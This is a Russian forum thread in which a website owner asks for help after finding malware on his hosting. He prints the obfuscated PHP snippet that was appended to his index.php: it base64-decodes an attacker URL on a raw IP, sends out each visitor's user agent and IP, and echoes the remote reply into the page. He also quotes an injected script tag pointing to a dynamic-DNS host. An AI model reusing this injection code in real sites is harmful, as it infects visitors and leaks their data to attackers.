Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   вирус на сайте (http://forum.oszone.net/showthread.php?t=274263)

NickNick 19-12-2013 02:24 2274733

вирус на сайте
 
сегодня обнаружил что на хостинге где лежит мой сайт появился вирус. В конце каждого html файл он дописывал скрипт с ссылкой. Обнаружил что index.php (сайт написан на Codeignater) изменен. В конце него написан следующий код php:

PHP код:

function textsafeunworker($id) {
    
$id intval($id);
    
$rtn $id date("j");
    return 
$rtn;
}

function 
workorunwork($in) {
    if (
textsafeunworker(64) < 1024) {
    
$rtn base64_decode($in);
    return 
$rtn;
    }
}
function 
workallt($newsid) {
    if (
date("j") - $newsid 320 ) {
        
$rtn false;
    } else {
    
$get workorunwork("aHR0cDovLzMxLjIxMC4xMTcuMTg3L3JlYWN0b3IucGhwP3BpZD0yJg==")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
    if (!isset(
$_COOKIE[workorunwork("ZGxlX3Bhc3N3b3Jk")])) {
    echo @
file_get_contents($get);
    }
    }
}
workallt (date("j"));?> 

Дописывает что-то типа:
HTML код:

<nofollow><script language='JavaScript' src=http://jnzmfuhw94.selfip.com/infob.php?i=25659></script>
Код я удалил.
Не могу понять через какую "дырку" это залезло? В логах доступа по ftp ничего подозрительно

iskander-k 21-12-2013 01:25 2275989

NickNick, Оставьте заявку по ссылке


Время: 00:06.

Время: 00:06.
© OSzone.net 2001-